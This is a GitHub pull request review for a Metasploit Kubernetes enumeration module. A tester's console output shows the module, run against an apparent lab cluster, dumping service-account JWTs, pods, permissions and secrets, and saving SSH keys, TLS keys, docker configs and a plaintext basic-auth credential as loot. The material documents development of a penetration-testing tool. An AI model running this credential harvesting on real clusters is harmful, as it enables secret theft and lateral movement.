-
Notifications
You must be signed in to change notification settings - Fork 13.8k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add kubernetes enum module #15786
Add kubernetes enum module #15786
Conversation
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Everything looks good to me. I tested it both with and without a session, the action commands, different outputs etc.
With a session
msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > show options
Module options (auxiliary/cloud/kubernetes/enum_kubernetes):
Name Current Setting Required Description
---- --------------- -------- -----------
HIGHLIGHT_NAME_PATTERN username|password|user|pass yes PCRE regex of resource names to highlight
NAME no The name of the resource to enumerate
NAMESPACE default no The Kubernetes namespace
NAMESPACE_LIST default,dev,staging,production,kube-public,kube-node-lease,kube-lease,kube-system no The default namespace list to iterate when the current token does not have the permission to retrieve the available namespaces
OUTPUT table yes output format to use (Accepted: table, json)
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS no The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT no The target port (TCP)
SESSION -1 no An optional session to use for configuration
SSL true no Negotiate SSL/TLS for outgoing connections
TOKEN no Kubernetes API token
VHOST no HTTP server virtual host
Auxiliary action:
Name Description
---- -----------
all enumerate all resources
msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > run
[*] Routing traffic through session: 2
[+] API Token: eyJhbGciOiJSUzI1NiIsImtpZCI6IjhNUXp3a1NGVk1xQmV0ZGVTbzNxTTJhQ2Y4UHE4TVZlVjVQcVlkMlRPcTgifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNjY2MzU2NjQwLCJpYXQiOjE2MzQ4MjA2NDAsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0IiwicG9kIjp7Im5hbWUiOiJ0aGlua3BocC04NDVkYjQ4OWNjLW54N2I5IiwidWlkIjoiYjBmYWZlZDctY2FkYi00OGI0LWIwYTUtZDRkZWE2YWEyZDIzIn0sInNlcnZpY2VhY2NvdW50Ijp7Im5hbWUiOiJ0aGlua3BocCIsInVpZCI6ImViOTJkOGNkLWI0NWYtNDQ1MC04N2ExLWU4MDBjNTc4OTMwNSJ9LCJ3YXJuYWZ0ZXIiOjE2MzQ4MjQyNDd9LCJuYmYiOjE2MzQ4MjA2NDAsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpkZWZhdWx0OnRoaW5rcGhwIn0.WiJFrdwJdJJtouTzI_bgAbLbvn6dF4L6tYuoYqinHwXcxc6udWdu-fnllnOutUZU2COxe__JZQcGp_90M9brUwz1W9fy7gnEtPgygYOE598U0P_FQQlkc85QKtVOA7sgnzOM8H9ILFGyB5sgOcDvv71gBRRMcfE1DRNCSvpKfjTKC2noi7yBYF6b38sYzyVt6BDICANbDKQ57ly8RZ78SHG9VNWYS7DcMRzTJgjH3p3-8uXmMFfF0tAUYzRGvsKHyb0QWJ1fKpv9MQ_HXpJABNoshj09GLWTCT3sBARZ4R_HqQ7Qzt_8Wmn9wU9AsuhNkUQ4fmCBFNqRvkn02OW8tw
[+] Kubernetes service host: 10.96.0.1:443
Token Claims
============
name value
---- -----
aud ["https://kubernetes.default.svc.cluster.local"]
exp 1666356640
iat 1634820640
iss https://kubernetes.default.svc.cluster.local
kubernetes.io.namespace default
kubernetes.io.pod.name thinkphp-845db489cc-nx7b9
kubernetes.io.pod.uid b0fafed7-cadb-48b4-b0a5-d4dea6aa2d23
kubernetes.io.serviceaccount.name thinkphp
kubernetes.io.serviceaccount.uid eb92d8cd-b45f-4450-87a1-e800c5789305
kubernetes.io.warnafter 1634824247
nbf 1634820640
sub system:serviceaccount:default:thinkphp
Server API Version
==================
name value
---- -----
buildDate 2021-08-19T15:39:34Z
compiler gc
gitCommit 632ed300f2c34f6d6d15ca4cef3d3c7073412212
gitTreeState clean
gitVersion v1.22.1
goVersion go1.16.7
major 1
minor 22
platform linux/amd64
[+] Enumerating namespaces
Namespaces
==========
# name
- ----
0 default
1 kube-node-lease
2 kube-public
3 kube-system
[+] Namespace 0: default
Auth (namespace: default)
=========================
Resources Non-Resource URLs Resource Names Verbs
--------- ----------------- -------------- -----
* [] [] [*]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
Pods (namespace: default)
=========================
# namespace name status containers ip
- --------- ---- ------ ---------- --
0 default aq9lbyfcgnqd Running nhkkmqsn8 (image: busybox) 172.17.0.4
1 default bekg Running heor3bf41aur (image: busybox) 172.17.0.20
2 default g297o9u3u Running xnh (image: kubernetesui/dashboard:v2.4.0) 172.17.0.11
3 default kkr2 Running qk6tl (image: kubernetesui/dashboard:v2.4.0) 172.17.0.17
4 default kubernetes-dashboard-6dbb4d957f-6tbdj Running kubernetes-dashboard (image: kubernetesui/dashboard:v2.4.0 TCP:8443) 172.17.0.15
5 default lucee-8c958d657-7hnf6 Running lucee (image: lucee/lucee:5.3.7.43 TCP:8888) 172.17.0.13
6 default meh Running ewpvec (image: kubernetesui/dashboard:v2.4.0) 172.17.0.7
7 default mh6 Running vmhss23ijz (image: busybox) 172.17.0.10
8 default oak2zku8qcb Running uwca5kkbwrv (image: kubernetesui/dashboard:v2.4.0) 172.17.0.12
9 default pkm082n3jgj Running p2dg6q (image: busybox) 172.17.0.9
10 default po5cltsu80h Running tj12 (image: busybox) 172.17.0.23
11 default port4gnlgeza Running r52g13 (image: busybox) 172.17.0.21
12 default rqb Running taqtdh (image: kubernetesui/dashboard:v2.4.0) 172.17.0.18
13 default syt Running otflepdi (image: kubernetesui/dashboard:v2.4.0) 172.17.0.5
14 default thinkphp-845db489cc-nx7b9 Running thinkphp (image: vulhub/thinkphp:5.0.23 TCP:80) 172.17.0.16
15 default tn2dn1iqs Running tag2ujl1h (image: kubernetesui/dashboard:v2.4.0) 172.17.0.2
16 default u1uubk1hx6 Running ykyijfc (image: kubernetesui/dashboard:v2.4.0) 172.17.0.3
17 default ui5wzz41j Running xad (image: busybox) 172.17.0.8
18 default ultumax92s Running x7drtuaz5apw (image: busybox) 172.17.0.19
19 default xfmln6v5ewg Running ffb (image: busybox) 172.17.0.22
20 default ydop9 Running p3ahr5o51 (image: kubernetesui/dashboard:v2.4.0) 172.17.0.6
Secrets (namespace: default)
============================
# namespace name type data age
- --------- ---- ---- ---- ---
0 default admin-sa-token-7s98l kubernetes.io/service-account-token ca.crt,namespace,token 21h
1 default default-token-db22s kubernetes.io/service-account-token ca.crt,namespace,token 21h
2 default kubernetes-dashboard-certs Opaque 21h
3 default kubernetes-dashboard-csrf Opaque csrf 21h
4 default kubernetes-dashboard-key-holder Opaque priv,pub 21h
5 default kubernetes-dashboard-token-h2p5h kubernetes.io/service-account-token ca.crt,namespace,token 21h
6 default lucee-token-stpnz kubernetes.io/service-account-token ca.crt,namespace,token 21h
7 default secrets-basic-auth kubernetes.io/basic-auth password,username 21h
8 default secrets-dockerconfigjson kubernetes.io/dockerconfigjson .dockerconfigjson 21h
9 default secrets-empty Opaque 21h
10 default secrets-id-ed25519-with-passphrase kubernetes.io/ssh-auth ssh-privatekey 21h
11 default secrets-id-ed25519-without-passphrase kubernetes.io/ssh-auth ssh-privatekey 21h
12 default secrets-id-rsa-with-passphrase kubernetes.io/ssh-auth ssh-privatekey 21h
13 default secrets-id-rsa-without-passphrase kubernetes.io/ssh-auth ssh-privatekey 21h
14 default secrets-tls kubernetes.io/tls tls.crt,tls.key 21h
15 default secrets-user-password Opaque password,username 21h
16 default sh.helm.release.v1.kubernetes-dashboard.v1 helm.sh/release.v1 release 21h
17 default sh.helm.release.v1.kubernetes-dashboard.v2 helm.sh/release.v1 release 21h
18 default sh.helm.release.v1.kubernetes-dashboard.v3 helm.sh/release.v1 release 19h
19 default sh.helm.release.v1.lucee.v1 helm.sh/release.v1 release 21h
20 default sh.helm.release.v1.secrets.v1 helm.sh/release.v1 release 21h
21 default sh.helm.release.v1.thinkphp.v1 helm.sh/release.v1 release 21h
22 default thinkphp-token-cml9b kubernetes.io/service-account-token ca.crt,namespace,token 21h
[+] service token admin-sa-token-7s98l: /home/smcintyre/.msf4/loot/20211021090713_default_0.0.0.0_kubernetes.token_814041.json
[+] service token default-token-db22s: /home/smcintyre/.msf4/loot/20211021090713_default_0.0.0.0_kubernetes.token_466982.json
[+] service token kubernetes-dashboard-token-h2p5h: /home/smcintyre/.msf4/loot/20211021090713_default_0.0.0.0_kubernetes.token_634542.json
[+] service token lucee-token-stpnz: /home/smcintyre/.msf4/loot/20211021090713_default_0.0.0.0_kubernetes.token_825176.json
[+] basic_auth secrets-basic-auth: root:password123
[-] Failed parsing secret secrets-basic-auth: key not found: :address
[+] dockerconfig json secrets-dockerconfigjson: /home/smcintyre/.msf4/loot/20211021090713_default_unknown_docker.json_709903.json
[+] ssh_key secrets-id-ed25519-with-passphrase: /home/smcintyre/.msf4/loot/20211021090713_default_unknown_id_rsa_116408.txt
[+] ssh_key secrets-id-ed25519-without-passphrase: /home/smcintyre/.msf4/loot/20211021090713_default_unknown_id_rsa_511551.txt
[+] ssh_key secrets-id-rsa-with-passphrase: /home/smcintyre/.msf4/loot/20211021090713_default_unknown_id_rsa_841986.txt
[+] ssh_key secrets-id-rsa-without-passphrase: /home/smcintyre/.msf4/loot/20211021090714_default_unknown_id_rsa_986674.txt
[+] tls_key secrets-tls: /home/smcintyre/.msf4/loot/20211021090714_default_unknown_tls.key_530539.txt
[+] tls_cert secrets-tls: /home/smcintyre/.msf4/loot/20211021090714_default_unknown_tls.cert_395790.crt (/CN=example.com)
[+] service token thinkphp-token-cml9b: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_737577.json
[+] Namespace 1: kube-node-lease
Auth (namespace: kube-node-lease)
=================================
Resources Non-Resource URLs Resource Names Verbs
--------- ----------------- -------------- -----
* [] [] [*]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
Pods (namespace: kube-node-lease)
=================================
# namespace name status containers ip
- --------- ---- ------ ---------- --
No rows
Secrets (namespace: kube-node-lease)
====================================
# namespace name type data age
- --------- ---- ---- ---- ---
0 kube-node-lease default-token-rr9hd kubernetes.io/service-account-token ca.crt,namespace,token 21h
[+] service token default-token-rr9hd: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_057560.json
[+] Namespace 2: kube-public
Auth (namespace: kube-public)
=============================
Resources Non-Resource URLs Resource Names Verbs
--------- ----------------- -------------- -----
* [] [] [*]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
Pods (namespace: kube-public)
=============================
# namespace name status containers ip
- --------- ---- ------ ---------- --
No rows
Secrets (namespace: kube-public)
================================
# namespace name type data age
- --------- ---- ---- ---- ---
0 kube-public default-token-jk68r kubernetes.io/service-account-token ca.crt,namespace,token 21h
[+] service token default-token-jk68r: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_368763.json
[+] Namespace 3: kube-system
Auth (namespace: kube-system)
=============================
Resources Non-Resource URLs Resource Names Verbs
--------- ----------------- -------------- -----
* [] [] [*]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
Pods (namespace: kube-system)
=============================
# namespace name status containers ip
- --------- ---- ------ ---------- --
0 kube-system coredns-78fcd69978-9ktdz Running coredns (image: k8s.gcr.io/coredns/coredns:v1.8.4 UDP:53,TCP:53,TCP:9153) 172.17.0.14
1 kube-system etcd-minikube Running etcd (image: k8s.gcr.io/etcd:3.5.0-0) 192.168.49.2
2 kube-system kube-apiserver-minikube Running kube-apiserver (image: k8s.gcr.io/kube-apiserver:v1.22.1) 192.168.49.2
3 kube-system kube-controller-manager-minikube Running kube-controller-manager (image: k8s.gcr.io/kube-controller-manager:v1.22.1) 192.168.49.2
4 kube-system kube-proxy-dzpmf Running kube-proxy (image: k8s.gcr.io/kube-proxy:v1.22.1) 192.168.49.2
5 kube-system kube-scheduler-minikube Running kube-scheduler (image: k8s.gcr.io/kube-scheduler:v1.22.1) 192.168.49.2
6 kube-system storage-provisioner Running storage-provisioner (image: gcr.io/k8s-minikube/storage-provisioner:v5) 192.168.49.2
Secrets (namespace: kube-system)
================================
# namespace name type data age
- --------- ---- ---- ---- ---
0 kube-system attachdetach-controller-token-8dxjl kubernetes.io/service-account-token ca.crt,namespace,token 21h
1 kube-system bootstrap-signer-token-wfvtd kubernetes.io/service-account-token ca.crt,namespace,token 21h
2 kube-system bootstrap-token-bfr928 bootstrap.kubernetes.io/token auth-extra-groups,expiration,token-id,token-secret,usage-bootstrap-authentication,usage-bootstrap-signing 21h
3 kube-system certificate-controller-token-h6jbb kubernetes.io/service-account-token ca.crt,namespace,token 21h
4 kube-system clusterrole-aggregation-controller-token-jqvwq kubernetes.io/service-account-token ca.crt,namespace,token 21h
5 kube-system coredns-token-g7vl2 kubernetes.io/service-account-token ca.crt,namespace,token 21h
6 kube-system cronjob-controller-token-z47mc kubernetes.io/service-account-token ca.crt,namespace,token 21h
7 kube-system daemon-set-controller-token-687t9 kubernetes.io/service-account-token ca.crt,namespace,token 21h
8 kube-system default-token-vkz9f kubernetes.io/service-account-token ca.crt,namespace,token 21h
9 kube-system deployment-controller-token-pkx8p kubernetes.io/service-account-token ca.crt,namespace,token 21h
10 kube-system disruption-controller-token-89g95 kubernetes.io/service-account-token ca.crt,namespace,token 21h
11 kube-system endpoint-controller-token-r524w kubernetes.io/service-account-token ca.crt,namespace,token 21h
12 kube-system endpointslice-controller-token-vmm8h kubernetes.io/service-account-token ca.crt,namespace,token 21h
13 kube-system endpointslicemirroring-controller-token-t79hc kubernetes.io/service-account-token ca.crt,namespace,token 21h
14 kube-system ephemeral-volume-controller-token-gknzr kubernetes.io/service-account-token ca.crt,namespace,token 21h
15 kube-system expand-controller-token-b8mp4 kubernetes.io/service-account-token ca.crt,namespace,token 21h
16 kube-system generic-garbage-collector-token-5w2j5 kubernetes.io/service-account-token ca.crt,namespace,token 21h
17 kube-system horizontal-pod-autoscaler-token-sjrxn kubernetes.io/service-account-token ca.crt,namespace,token 21h
18 kube-system job-controller-token-wn84n kubernetes.io/service-account-token ca.crt,namespace,token 21h
19 kube-system kube-proxy-token-7x5lg kubernetes.io/service-account-token ca.crt,namespace,token 21h
20 kube-system namespace-controller-token-9bb4x kubernetes.io/service-account-token ca.crt,namespace,token 21h
21 kube-system node-controller-token-l44n2 kubernetes.io/service-account-token ca.crt,namespace,token 21h
22 kube-system persistent-volume-binder-token-nhpj2 kubernetes.io/service-account-token ca.crt,namespace,token 21h
23 kube-system pod-garbage-collector-token-sfk5t kubernetes.io/service-account-token ca.crt,namespace,token 21h
24 kube-system pv-protection-controller-token-4mbl5 kubernetes.io/service-account-token ca.crt,namespace,token 21h
25 kube-system pvc-protection-controller-token-htj54 kubernetes.io/service-account-token ca.crt,namespace,token 21h
26 kube-system replicaset-controller-token-fhd7g kubernetes.io/service-account-token ca.crt,namespace,token 21h
27 kube-system replication-controller-token-rw9sx kubernetes.io/service-account-token ca.crt,namespace,token 21h
28 kube-system resourcequota-controller-token-6p6n5 kubernetes.io/service-account-token ca.crt,namespace,token 21h
29 kube-system root-ca-cert-publisher-token-ghc5g kubernetes.io/service-account-token ca.crt,namespace,token 21h
30 kube-system service-account-controller-token-s8kp5 kubernetes.io/service-account-token ca.crt,namespace,token 21h
31 kube-system service-controller-token-lngkb kubernetes.io/service-account-token ca.crt,namespace,token 21h
32 kube-system statefulset-controller-token-bwlgx kubernetes.io/service-account-token ca.crt,namespace,token 21h
33 kube-system storage-provisioner-token-2gj94 kubernetes.io/service-account-token ca.crt,namespace,token 21h
34 kube-system token-cleaner-token-fwbmc kubernetes.io/service-account-token ca.crt,namespace,token 21h
35 kube-system ttl-after-finished-controller-token-jrfjc kubernetes.io/service-account-token ca.crt,namespace,token 21h
36 kube-system ttl-controller-token-nv9px kubernetes.io/service-account-token ca.crt,namespace,token 21h
[+] service token attachdetach-controller-token-8dxjl: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_887172.json
[+] service token bootstrap-signer-token-wfvtd: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_339866.json
[+] service token certificate-controller-token-h6jbb: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_316093.json
[+] service token clusterrole-aggregation-controller-token-jqvwq: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_426673.json
[+] service token coredns-token-g7vl2: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_286146.json
[+] service token cronjob-controller-token-z47mc: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_294634.json
[+] service token daemon-set-controller-token-687t9: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_564661.json
[+] service token default-token-vkz9f: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_625308.json
[+] service token deployment-controller-token-pkx8p: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_706873.json
[+] service token disruption-controller-token-89g95: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_619323.json
[+] service token endpoint-controller-token-r524w: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_305779.json
[+] service token endpointslice-controller-token-vmm8h: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_718735.json
[+] service token endpointslicemirroring-controller-token-t79hc: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_810878.json
[+] service token ephemeral-volume-controller-token-gknzr: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_559646.json
[+] service token expand-controller-token-b8mp4: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_393300.json
[+] service token generic-garbage-collector-token-5w2j5: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_373751.json
[+] service token horizontal-pod-autoscaler-token-sjrxn: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_721652.json
[+] service token job-controller-token-wn84n: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_205132.json
[+] service token kube-proxy-token-7x5lg: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_524390.json
[+] service token namespace-controller-token-9bb4x: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_886498.json
[+] service token node-controller-token-l44n2: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_771745.json
[+] service token persistent-volume-binder-token-nhpj2: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_304163.json
[+] service token pod-garbage-collector-token-sfk5t: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_714133.json
[+] service token pv-protection-controller-token-4mbl5: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_376293.json
[+] service token pvc-protection-controller-token-htj54: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_547055.json
[+] service token replicaset-controller-token-fhd7g: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_069845.json
[+] service token replication-controller-token-rw9sx: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_082870.json
[+] service token resourcequota-controller-token-6p6n5: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_664006.json
[+] service token root-ca-cert-publisher-token-ghc5g: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_898265.json
[+] service token service-account-controller-token-s8kp5: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_922978.json
[+] service token service-controller-token-lngkb: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_965027.json
[+] service token statefulset-controller-token-bwlgx: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_989428.json
[+] service token storage-provisioner-token-2gj94: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_832281.json
[+] service token token-cleaner-token-fwbmc: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_561991.json
[+] service token ttl-after-finished-controller-token-jrfjc: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_112416.json
[+] service token ttl-controller-token-nv9px: /home/smcintyre/.msf4/loot/20211021090714_default_0.0.0.0_kubernetes.token_719132.json
[*] Auxiliary module execution completed
msf6 auxiliary(cloud/kubernetes/enum_kubernetes) >
Without a session
msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > set TOKEN eyJhbGciOiJSUzI1NiIsImtpZCI6IjhNUXp3a1NGVk1xQmV0ZGVTbzNxTTJhQ2Y4UHE4TVZlVjVQcVlkMlRPcTgifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJkZWZhdWx0Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZWNyZXQubmFtZSI6ImFkbWluLXNhLXRva2VuLTdzOThsIiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZXJ2aWNlLWFjY291bnQubmFtZSI6ImFkbWluLXNhIiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZXJ2aWNlLWFjY291bnQudWlkIjoiMmNjMDM1MzktNjhhYS00Mjg2LWE4ZmMtYjdmMDI5NzMzOGM5Iiwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50OmRlZmF1bHQ6YWRtaW4tc2EifQ.rY4MMougu_xPsKsACXcbkJC7ueLzH3YMHlviEpR9o0rKHHAxjDLTK7sC9j1brBkV7oc2kFwbmrlvQ5LEleyeughXq_GfPm47CnUg2Orhv80a7gmJU_WP_mkLhD1xcb4d-7uzEk08V5lswxCTof7qQK7UQBaGI4k6d_6B15jkCBd8fFdl1XqMAN1rokM5YmIwq_i_Eu-hquZIEduqyW2p9V-JVMYC82mLFdffcsjvZeXfOLgr8yiFEvTUZUEnhqZFaLRiT4ioMWQ939fQvLoFVAcloSwk09GM_xS4_8oMCfJd4D5sSCtshN_cEMX_Ht-M2JwjK_tVLTCnbheOwTZPxw
TOKEN => eyJhbGciOiJSUzI1NiIsImtpZCI6IjhNUXp3a1NGVk1xQmV0ZGVTbzNxTTJhQ2Y4UHE4TVZlVjVQcVlkMlRPcTgifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJkZWZhdWx0Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZWNyZXQubmFtZSI6ImFkbWluLXNhLXRva2VuLTdzOThsIiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZXJ2aWNlLWFjY291bnQubmFtZSI6ImFkbWluLXNhIiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZXJ2aWNlLWFjY291bnQudWlkIjoiMmNjMDM1MzktNjhhYS00Mjg2LWE4ZmMtYjdmMDI5NzMzOGM5Iiwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50OmRlZmF1bHQ6YWRtaW4tc2EifQ.rY4MMougu_xPsKsACXcbkJC7ueLzH3YMHlviEpR9o0rKHHAxjDLTK7sC9j1brBkV7oc2kFwbmrlvQ5LEleyeughXq_GfPm47CnUg2Orhv80a7gmJU_WP_mkLhD1xcb4d-7uzEk08V5lswxCTof7qQK7UQBaGI4k6d_6B15jkCBd8fFdl1XqMAN1rokM5YmIwq_i_Eu-hquZIEduqyW2p9V-JVMYC82mLFdffcsjvZeXfOLgr8yiFEvTUZUEnhqZFaLRiT4ioMWQ939fQvLoFVAcloSwk09GM_xS4_8oMCfJd4D5sSCtshN_cEMX_Ht-M2JwjK_tVLTCnbheOwTZPxw
msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > run https://192.168.159.31:8443 SESSION=""
[*] Running module against 192.168.159.31
Token Claims
============
name value
---- -----
iss kubernetes/serviceaccount
kubernetes.io/serviceaccount/namespace default
kubernetes.io/serviceaccount/secret.name admin-sa-token-7s98l
kubernetes.io/serviceaccount/service-account.name admin-sa
kubernetes.io/serviceaccount/service-account.uid 2cc03539-68aa-4286-a8fc-b7f0297338c9
sub system:serviceaccount:default:admin-sa
Server API Version
==================
name value
---- -----
buildDate 2021-08-19T15:39:34Z
compiler gc
gitCommit 632ed300f2c34f6d6d15ca4cef3d3c7073412212
gitTreeState clean
gitVersion v1.22.1
goVersion go1.16.7
major 1
minor 22
platform linux/amd64
[+] Enumerating namespaces
Namespaces
==========
# name
- ----
0 default
1 kube-node-lease
2 kube-public
3 kube-system
[+] Namespace 0: default
Auth (namespace: default)
=========================
Resources Non-Resource URLs Resource Names Verbs
--------- ----------------- -------------- -----
*.* [] [] [*]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
[*] [] [*]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
Pods (namespace: default)
=========================
# namespace name status containers ip
- --------- ---- ------ ---------- --
0 default aq9lbyfcgnqd Running nhkkmqsn8 (image: busybox) 172.17.0.4
1 default bekg Running heor3bf41aur (image: busybox) 172.17.0.20
2 default g297o9u3u Running xnh (image: kubernetesui/dashboard:v2.4.0) 172.17.0.11
3 default kkr2 Running qk6tl (image: kubernetesui/dashboard:v2.4.0) 172.17.0.17
4 default kubernetes-dashboard-6dbb4d957f-6tbdj Running kubernetes-dashboard (image: kubernetesui/dashboard:v2.4.0 TCP:8443) 172.17.0.15
5 default lucee-8c958d657-7hnf6 Running lucee (image: lucee/lucee:5.3.7.43 TCP:8888) 172.17.0.13
6 default meh Running ewpvec (image: kubernetesui/dashboard:v2.4.0) 172.17.0.7
7 default mh6 Running vmhss23ijz (image: busybox) 172.17.0.10
8 default oak2zku8qcb Running uwca5kkbwrv (image: kubernetesui/dashboard:v2.4.0) 172.17.0.12
9 default pkm082n3jgj Running p2dg6q (image: busybox) 172.17.0.9
10 default po5cltsu80h Running tj12 (image: busybox) 172.17.0.23
11 default port4gnlgeza Running r52g13 (image: busybox) 172.17.0.21
12 default rqb Running taqtdh (image: kubernetesui/dashboard:v2.4.0) 172.17.0.18
13 default syt Running otflepdi (image: kubernetesui/dashboard:v2.4.0) 172.17.0.5
14 default thinkphp-845db489cc-nx7b9 Running thinkphp (image: vulhub/thinkphp:5.0.23 TCP:80) 172.17.0.16
